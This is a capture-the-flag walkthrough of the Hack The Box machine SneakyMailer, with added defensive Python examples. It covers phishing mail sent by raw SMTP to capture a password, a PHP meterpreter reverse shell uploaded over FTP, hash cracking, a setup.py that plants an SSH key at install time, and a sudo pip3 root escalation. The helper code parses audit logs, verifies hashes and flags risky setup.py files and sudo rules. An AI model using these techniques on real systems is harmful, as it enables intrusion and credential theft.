- Other walkthrough: http://insec.in/2020/07/15/hack-the-box-sneakymailer-walkthrough/
Scanning
IP=10.10.10.197
nmap -T4 -sT -p 1-65535 $IP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-21 17:40 EDT
Nmap scan report for 10.10.10.197
Host is up (0.098s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
143/tcp open imap
993/tcp open imaps
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 234.67 seconds
Nothing interesting from the nmap scripts or from gobuster (no hidden pages found).
Solution for user low
- http://10.10.10.197:8080/ returns a page for nginx
- http://10.10.10.197:80 redirects to sneakycorp.htb
sneakycorp.htb MUST BE ADDED TO /etc/hosts
nano /etc/hosts
10.10.10.197 sneakycorp.htb
Go to http://sneakycorp.htb/team.php and keep note of email addresses.
We need a web server that logs the requests it receives, so we use the Apache already installed on Kali Linux and enable ModSecurity auditing to record them. Network sniffing with Wireshark would have been faster…
apt install libapache2-mod-security2
mv /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf
nano /etc/modsecurity/modsecurity.conf
Comment out the rules and set:
SecAuditEngine On
service apache2 reload
We need to send a phishing email (the machine logo, a guy fishing, was also a hint…)
IP=10.10.10.197
nc -C $IP 25
HELO sneakycorp.htb
MAIL FROM:carastevens@sneakymailer.htb
RCPT TO:airisatou@sneakymailer.htb
RCPT TO:angelicaramos@sneakymailer.htb
RCPT TO:ashtoncox@sneakymailer.htb
RCPT TO:bradleygreer@sneakymailer.htb
RCPT TO:brendenwagner@sneakymailer.htb
RCPT TO:briellewilliamson@sneakymailer.htb
RCPT TO:brunonash@sneakymailer.htb
RCPT TO:caesarvance@sneakymailer.htb
RCPT TO:carastevens@sneakymailer.htb
RCPT TO:cedrickelly@sneakymailer.htb
RCPT TO:chardemarshall@sneakymailer.htb
RCPT TO:colleenhurst@sneakymailer.htb
RCPT TO:dairios@sneakymailer.htb
RCPT TO:donnasnider@sneakymailer.htb
RCPT TO:doriswilder@sneakymailer.htb
RCPT TO:finncamacho@sneakymailer.htb
RCPT TO:fionagreen@sneakymailer.htb
RCPT TO:garrettwinters@sneakymailer.htb
RCPT TO:gavincortez@sneakymailer.htb
RCPT TO:gavinjoyce@sneakymailer.htb
RCPT TO:glorialittle@sneakymailer.htb
RCPT TO:haleykennedy@sneakymailer.htb
RCPT TO:hermionebutler@sneakymailer.htb
RCPT TO:herrodchandler@sneakymailer.htb
RCPT TO:hopefuentes@sneakymailer.htb
RCPT TO:howardhatfield@sneakymailer.htb
RCPT TO:jacksonbradshaw@sneakymailer.htb
RCPT TO:jenagaines@sneakymailer.htb
RCPT TO:jenettecaldwell@sneakymailer.htb
RCPT TO:jenniferacosta@sneakymailer.htb
RCPT TO:jenniferchang@sneakymailer.htb
RCPT TO:jonasalexander@sneakymailer.htb
RCPT TO:laelgreer@sneakymailer.htb
RCPT TO:martenamccray@sneakymailer.htb
RCPT TO:michaelsilva@sneakymailer.htb
RCPT TO:michellehouse@sneakymailer.htb
RCPT TO:olivialiang@sneakymailer.htb
RCPT TO:paulbyrd@sneakymailer.htb
RCPT TO:prescottbartlett@sneakymailer.htb
RCPT TO:quinnflynn@sneakymailer.htb
RCPT TO:rhonadavidson@sneakymailer.htb
RCPT TO:sakurayamamoto@sneakymailer.htb
RCPT TO:sergebaldwin@sneakymailer.htb
RCPT TO:shaddecker@sneakymailer.htb
RCPT TO:shouitou@sneakymailer.htb
RCPT TO:sonyafrost@sneakymailer.htb
RCPT TO:sukiburks@sneakymailer.htb
RCPT TO:sulcud@sneakymailer.htb
RCPT TO:tatyanafitzpatrick@sneakymailer.htb
RCPT TO:thorwalton@sneakymailer.htb
RCPT TO:tigernixon@sneakymailer.htb
RCPT TO:timothymooney@sneakymailer.htb
RCPT TO:unitybutler@sneakymailer.htb
RCPT TO:vivianharrell@sneakymailer.htb
RCPT TO:yuriberry@sneakymailer.htb
RCPT TO:zenaidafrank@sneakymailer.htb
RCPT TO:zoritaserrano@sneakymailer.htb
DATA
From: carastevens@sneakymailer.htb
To: glorialittle@sneakymailer.htb
Date: Mon, 12 Apr 2020 14:21:26 -0400
Subject: Test Message
This is a phishing email
http://10.10.14.23:80/php_shell.php
.
250 2.0.0 Ok: queued as 540F724667
QUIT
Alternative request catcher instead of the local Apache: https://webhook.site/492afef8-9c67-455f-b2e6-9aa7afc88ced
The POST request should now appear in the ModSecurity audit log.
cat /var/log/apache2/modsec_audit.log
firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt
URL-decode it (online decoder):
firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
PASSWORD FOUND: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
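Pasting a captured credential into an online decoder hands it to a third party. The following is an added example (not part of the original walkthrough) that does the same job offline: it splits a ModSecurity audit log in its native serial format into parts (A = header, B = request headers, C = request body, Z = end of entry), picks the form-encoded bodies and URL-decodes them. The log sample is constructed in that format with a placeholder password, not the real capture.

```python
"""Extract URL-encoded POST bodies from a ModSecurity audit log (native/serial
format) and decode the form fields locally.  Added example; SAMPLE_LOG is a
constructed entry with a placeholder password."""
import re
from urllib.parse import parse_qs

# Every part of a native-format entry starts with "--<boundary>-<letter>--".
PART_RE = re.compile(r"^--([0-9A-Za-z]+)-([A-Z])--$", re.M)

SAMPLE_LOG = """--9f4c1a2b-A--
[21/Sep/2020:17:55:02 --0400] X2kAbcdefghijkl 10.10.10.197 43210 10.10.14.23 80
--9f4c1a2b-B--
POST /php_shell.php HTTP/1.1
Host: 10.10.14.23
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

--9f4c1a2b-C--
firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=EXAMPLE%5Epass%26word&rpassword=EXAMPLE%5Epass%26word
--9f4c1a2b-F--
HTTP/1.1 404 Not Found
--9f4c1a2b-Z--

"""


def split_entries(log_text):
    """Return one dict per audit entry, mapping part letter -> part text."""
    markers = [(m.start(), m.end(), m.group(1), m.group(2))
               for m in PART_RE.finditer(log_text)]
    entries, order = {}, []
    for i, (start, end, boundary, letter) in enumerate(markers):
        body_end = markers[i + 1][0] if i + 1 < len(markers) else len(log_text)
        part = log_text[end:body_end].strip("\n")
        if boundary not in entries:
            entries[boundary] = {}
            order.append(boundary)
        entries[boundary][letter] = part
    return [entries[b] for b in order]


def request_line(entry):
    """First line of part B, e.g. 'POST /php_shell.php HTTP/1.1'."""
    headers = entry.get("B", "")
    return headers.splitlines()[0] if headers else ""


def extract_form_posts(log_text):
    """Return (request_line, {field: value}) for each entry with a form body."""
    results = []
    for entry in split_entries(log_text):
        body = entry.get("C", "")
        headers = entry.get("B", "")
        if not body or "application/x-www-form-urlencoded" not in headers:
            continue
        # parse_qs splits on '&' before percent-decoding, so '%26' inside a
        # value stays part of that value.
        fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
        results.append((request_line(entry), fields))
    return results


if __name__ == "__main__":
    for line, fields in extract_form_posts(SAMPLE_LOG):
        print(line)
        for k, v in fields.items():
            print(f"  {k} = {v}")
```

Point it at /var/log/apache2/modsec_audit.log (open the file and pass its contents to extract_form_posts) to list every form submission the catcher recorded.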
READ EMAILS OF PAUL: install a mail client
apt-get install evolution
evolution
In tab Identity:
Email address: paulbyrd@sneakymailer.htb
In tab Receiving mail:
Server: 10.10.10.197
Username: paulbyrd@sneakymailer.htb
In tab Sending mail:
Server: 10.10.10.197
When prompted for the password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
In one of the emails:
Hello administrator, I want to change this password for the developer account
Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
Please notify me when you do it
Found: Username: developer, password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
Create a PHP reverse shell that will be uploaded over FTP
cd /root/htb
# Generate a reverse shell
KALI_IP=10.10.14.23
LISTENER_PORT=4444
msfvenom -p php/meterpreter/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f raw > php_shell.php
Log into the FTP using found credentials.
dev.sneakycorp.htb & pypi.sneakycorp.htb MUST BE ADDED TO /etc/hosts
ftp 10.10.10.197
developer
m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
ls
dev
cd dev
ls
put /root/htb/php_shell.php php_shell.php
ls
Start a listener
msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 10.10.14.23
set LPORT 4444
set ExitOnSession false
exploit -j -z
Visit http://dev.sneakycorp.htb/php_shell.php
sessions
sessions -i 1
shell
python -c 'import pty; pty.spawn("/bin/bash")'
whoami
www-data
su developer
m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
cd /var/www
cd pypi.sneakycorp.htb
cat .htpasswd
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
Hash to crack: $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
#hash type: 1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR) | HTTP, SMTP, LDAP Server
HASH=/root/htb/hash.txt
TYPE=1600
WL=/usr/share/wordlists/rockyou.txt
hashcat -m $TYPE -a 0 $HASH $WL --force
# Show results
hashcat -m $TYPE $HASH --show
Password found: soufianeelhaoui
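To confirm the hashcat result (or to check a suspected weak htpasswd entry) without sending the hash to an online service, here is an added Python implementation of the Apache $apr1$ scheme; it is not the page's own tooling. $apr1$ is md5crypt with the magic string "$apr1$": three MD5 setup steps, then 1000 stretching rounds, then a fixed byte transposition into a 22-character base-64 variant. 1000 rounds of MD5 is why a rockyou run against it finishes in seconds; on a server you control, regenerate entries with htpasswd -B (bcrypt) and keep .htpasswd readable only by the web server.

```python
"""Verify a password candidate against an Apache $apr1$ htpasswd entry.
Added example implementing the md5crypt algorithm with the "$apr1$" magic."""
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """md5crypt's base-64 variant: low 6 bits first, `count` characters."""
    chars = []
    for _ in range(count):
        chars.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(chars)


def apr1_crypt(password, salt):
    """Return the full '$apr1$<salt>$<22 chars>' string for password and salt."""
    pw = password.encode()
    sl = salt.encode()[:8]
    magic = b"$apr1$"

    ctx = hashlib.md5(pw + magic + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    remaining = len(pw)
    while remaining > 0:                    # alt digest, repeated to len(pw) bytes
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    i = len(pw)
    while i:                                # one byte per bit of len(pw)
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    # Only 1000 rounds: cheap enough that GPU wordlist attacks are trivial.
    for r in range(1000):
        c = hashlib.md5()
        c.update(pw if r & 1 else final)
        if r % 3:
            c.update(sl)
        if r % 7:
            c.update(pw)
        c.update(final if r & 1 else pw)
        final = c.digest()

    f = final
    groups = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    encoded = "".join(_to64((f[a] << 16) | (f[b] << 8) | f[c], 4) for a, b, c in groups)
    encoded += _to64(f[11], 2)
    return "$apr1$" + salt + "$" + encoded


def verify_htpasswd(candidate, entry):
    """entry is a 'user:$apr1$salt$hash' line as found in .htpasswd."""
    _user, _, stored = entry.partition(":")
    parts = stored.split("$")
    if len(parts) != 4 or parts[1] != "apr1":
        raise ValueError("not an $apr1$ entry")
    salt = parts[2]
    return hmac.compare_digest(apr1_crypt(candidate, salt), stored)


if __name__ == "__main__":
    entry = "pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/"
    print("match:", verify_htpasswd("soufianeelhaoui", entry))
```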
cat /etc/passwd | grep -v nologin
root:x:0:0:root:/root:/bin/bash
low:x:1000:1000:,,,:/home/low:/bin/bash
developer:x:1001:1001:,,,:/var/www/dev.sneakycorp.htb:/bin/bash
Visit http://pypi.sneakycorp.htb:8080/
Welcome to pypiserver!
This is a PyPI compatible package index serving 0 packages.
To use this server with pip, run the following command:
pip install --index-url http://pypi.sneakycorp.htb/simple/ PACKAGE [PACKAGE2...]
To use this server with easy_install, run the following command:
easy_install --index-url http://pypi.sneakycorp.htb/simple/ PACKAGE [PACKAGE2...]
The complete list of all packages can be found here or via the simple index.
This instance is running version 1.3.2 of the pypiserver software.
Create these files locally (nano and vi don't work in the meterpreter session); we will upload them later.
.pypirc
[distutils]
index-servers = local
[local]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui
Generate my key to add to authorized_keys on the machine
# Generate a public/private key pair on kali
ssh-keygen -t rsa
[leave all default parameters]
cat id_rsa.pub
ssh-rsa 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 root@kaliz
setup.py (put my RSA key)
import setuptools

# Runs whenever setup.py is executed (sdist build or pip install of the sdist)
try:
    with open("/home/low/.ssh/authorized_keys", "a") as f:
        f.write("\nssh-rsa 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 root@kaliz")
        f.close()
except Exception as e:
    pass

setuptools.setup(
    name="root",  # My username
    version="0.0.1",
    author="Example Author",
    author_email="author@example.com",
    description="A small example package",
    long_description="",
    long_description_content_type="text/markdown",
    url="https://github.com/pypa/sampleproject",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
)
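A setup.py is ordinary Python: building the sdist and every later pip install of it execute the file, so any account that installs packages from an index that accepted this upload runs the try block above. The following is an added example (not pypiserver's own checks, which do not inspect setup.py) of a static review that flags setup.py files doing more than declaring metadata: module-level statements other than imports, assignments and the setup() call, imports of OS-level modules, and calls such as open(). The two samples are constructed; TAMPERED mirrors the shape of the package above with placeholder path and key, and the watch-lists are an illustrative set.

```python
"""Static review of setup.py files for code that runs at build/install time.
Added example; the heuristics and both samples are constructed."""
import ast

SUSPICIOUS_CALLS = {"open", "exec", "eval", "compile", "__import__"}
SUSPICIOUS_MODULES = {"os", "subprocess", "socket", "shutil", "urllib", "requests", "ctypes"}
SETUP_CALLS = {"setup", "setuptools.setup", "distutils.core.setup"}

BENIGN = '''import setuptools
setuptools.setup(name="example", version="0.0.1", packages=setuptools.find_packages())
'''

# Constructed to mirror the package used on this box; path and key are placeholders.
TAMPERED = '''import setuptools
try:
    with open("/home/EXAMPLE_USER/.ssh/authorized_keys", "a") as f:
        f.write("ssh-rsa PLACEHOLDER_KEY")
except Exception:
    pass
setuptools.setup(name="root", version="0.0.1")
'''


def _call_name(node):
    """Dotted name of a Call target: 'open', 'os.system', 'setuptools.setup'."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        parts, base = [func.attr], func.value
        while isinstance(base, ast.Attribute):
            parts.append(base.attr)
            base = base.value
        if isinstance(base, ast.Name):
            parts.append(base.id)
        return ".".join(reversed(parts))
    return ""


def _is_setup_call(stmt):
    return (isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call)
            and _call_name(stmt.value) in SETUP_CALLS)


def audit_setup_py(source):
    """Return a list of findings; an empty list means nothing looked suspicious."""
    findings = []
    tree = ast.parse(source)
    for stmt in tree.body:
        if isinstance(stmt, ast.Import):
            modules = [alias.name.split(".")[0] for alias in stmt.names]
        elif isinstance(stmt, ast.ImportFrom):
            modules = [(stmt.module or "").split(".")[0]]
        else:
            modules = None
        if modules is not None:
            findings.extend(f"line {stmt.lineno}: imports {m}"
                            for m in modules if m in SUSPICIOUS_MODULES)
            continue
        if isinstance(stmt, ast.Assign) or _is_setup_call(stmt):
            continue
        # Anything else at module level (try, with, if, def, loops...) runs code
        # at build/install time and deserves a look.
        findings.append(f"line {stmt.lineno}: top-level {type(stmt).__name__} outside setup()")
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in SUSPICIOUS_CALLS or name.split(".")[0] in SUSPICIOUS_MODULES:
                findings.append(f"line {node.lineno}: call to {name}()")
    return findings


if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("tampered", TAMPERED)):
        print(label, audit_setup_py(src) or "clean")
```

Run it over the setup.py extracted from each sdist before (or after) it lands on a private index; on the box, the same review would have flagged the package above on two counts, the top-level try and the open() call.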
Using previous meterpreter session, upload the files
exit
exit
exit
# NOT IN A SHELL, IN METERPRETER SESSION
upload /root/htb/pkg/.pypirc /tmp/pkg/.pypirc
upload /root/htb/pkg/setup.py /tmp/pkg/setup.py
shell
python -c 'import pty; pty.spawn("/bin/bash")'
cd /tmp/pkg
chmod 777 .pypirc
chmod 777 setup.py
su developer
m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
# setuptools reads .pypirc from $HOME, so point HOME at /tmp/pkg
HOME=$(pwd)
python3 setup.py sdist register -r local upload -r local
FINALLY connect as user low
cd .ssh
chmod 700 id_rsa
ssh -i id_rsa low@10.10.10.197
ls -la
cat user.txt
80b7d2332a737280abcd24c91bf2d826
Solution for root user
Privilege escalation from user low to root
sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User low may run the following commands on sneakymailer:
(root) NOPASSWD: /usr/bin/pip3
Use the GTFOBins privilege escalation method for sudo on pip:
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip3 install $TF
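The sudo -l output above is the kind of listing an administrator should be auditing before an attacker reads it: a NOPASSWD rule on a package manager or interpreter is a root shell for whoever holds that account. The following is an added example, not from the page, that parses the sudo -l format shown above and flags such rules; the sample output is constructed in the shape of this box's listing, and the watch-list of binaries is a short illustrative set of GTFOBins entries.

```python
"""Parse 'sudo -l' output and flag NOPASSWD rules on binaries that give a
shell.  Added example; SAMPLE is constructed in the format shown on this box."""
import re

# Basenames documented on GTFOBins as sudo shell escapes (illustrative subset).
ESCAPABLE = {"pip", "pip3", "python", "python2", "python3", "perl", "ruby",
             "gem", "npm", "vi", "vim", "less", "find", "awk", "env", "bash", "sh"}

# "(runas) TAG: TAG: /path/cmd args, /other/cmd"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

SAMPLE = """Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User low may run the following commands on sneakymailer:
    (root) NOPASSWD: /usr/bin/pip3
    (root) /usr/bin/systemctl restart nginx
"""


def parse_sudo_l(text):
    """Return one dict per rule: runas, tags (set), command."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split() if t.rstrip(":")}
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": m.group("runas").strip(),
                          "tags": tags, "command": cmd.strip()})
    return rules


def find_shell_escapes(rules):
    """Flag password-less rules whose binary is a known shell escape (or ALL)."""
    findings = []
    for r in rules:
        binary = r["command"].split()[0]
        base = binary.rsplit("/", 1)[-1]
        if "NOPASSWD" in r["tags"] and (base in ESCAPABLE or binary == "ALL"):
            findings.append(f"{r['command']} as ({r['runas']}) without a password: "
                            f"GTFOBins documents a shell escape for {base}")
    return findings


if __name__ == "__main__":
    for finding in find_shell_escapes(parse_sudo_l(SAMPLE)):
        print(finding)
```

Feed it the real listing (sudo -l run as each service account, or the rules section of /etc/sudoers rendered the same way) and treat every finding as a root-equivalent grant; the fix on this box is to remove the pip3 rule or replace it with a wrapper that takes no caller-controlled package path.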
cd
ls -la
cat root.txt
7b4ea607d20d73af3fb31026e8319e1a